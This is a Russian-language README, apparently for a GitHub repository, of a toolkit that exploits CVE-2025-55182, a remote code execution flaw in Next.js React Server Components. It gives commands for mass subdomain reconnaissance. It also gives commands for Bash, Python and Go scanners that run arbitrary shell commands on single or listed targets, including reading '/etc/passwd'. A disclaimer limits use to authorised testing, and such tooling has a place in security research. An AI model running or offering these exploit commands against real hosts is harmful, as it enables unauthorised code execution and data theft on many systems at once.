
Многоязычный сканер для CVE-2025-55182 RCE в Next.js React Server Components, с режимами одиночного и массового сканирования и встроенным рабочим процессом разведки для bug bounty.
Комплексный набор инструментов для обнаружения и эксплуатации CVE-2025-55182, критической уязвимости удаленного выполнения кода в приложениях Next.js, использующих React Server Components.
Этот репозиторий включает единый Bash-сканер (режим одиночной и массовой проверки), реализации на Python/Go и рабочий процесс разведки для баг-баунти.

Для массового поиска на wildcard-доменах используйте этот пайплайн для фильтрации целей перед сканированием:
# 1. Перечисление поддоменов
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Фильтрация живых хостов
httpx -l subs.txt -o live.txt
# 3. Предварительное обнаружение с помощью Nuclei (опционально)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Скрипт scanner.sh поддерживает одиночную проверку цели и массовое сканирование из файла со списком.
chmod +x scanner.sh
Лучше всего подходит для проверки конкретной цели с подробным выводом.
# Базовая проверка (по умолчанию "id")
./scanner.sh -d example.com
# Выполнение произвольной команды
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Эффективно сканирует список URL и сохраняет уязвимые хосты в файл.
# Сканирование списка URL
./scanner.sh -l live.txt -c "whoami"
# Пользовательский выходной файл
./scanner.sh -l live.txt -o my_bounty.txt
Используйте её, если возникают проблемы с экранированием специальных символов в Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Высокая производительность, минимальные зависимости.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование строго запрещено законом. Разработчик не несет ответственности за неправомерное использование или ущерб, причиненный данной программой.
Детали CVE от NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Рекомендации по безопасности React (уязвимость React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Шаблон Nuclei от ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Флаг | Описание |
|---|
-d, --domain | URL одиночной цели |
-l, --list | Файл со списком URL |
-c, --command | Команда для выполнения (по умолчанию: id) |
-o, --output | Выходной файл для уязвимых хостов (по умолчанию: vulnerable_hosts.txt) |